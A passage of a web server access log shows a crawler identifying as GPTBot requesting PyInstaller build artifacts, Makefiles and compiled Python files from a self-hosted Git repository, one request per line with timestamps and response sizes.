(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:15:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 80833] [Gzip 29.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:15:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 9915] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:15:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 28049] [Gzip 20.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:15:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 9896] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:15:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 22366] [Gzip 11.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" +[17/Feb/2026:15:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10935] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" +[17/Feb/2026:15:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 129724] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:15:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10198] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 10374] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:15:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 27977] [Gzip 20.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:15:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16189] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" +[17/Feb/2026:15:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 23508] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" +[17/Feb/2026:15:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 14152496] [Gzip 11.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:15:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 31774] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:15:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 26804] [Gzip 20.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:15:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51205] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10948] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:15:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:15:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:15:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10933] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:15:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10945] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:15:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:15:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:15:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16921] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 33418] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:15:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16922] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:15:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21837] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73577] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14336] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24015] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:15:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:15:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11072] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:15:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr 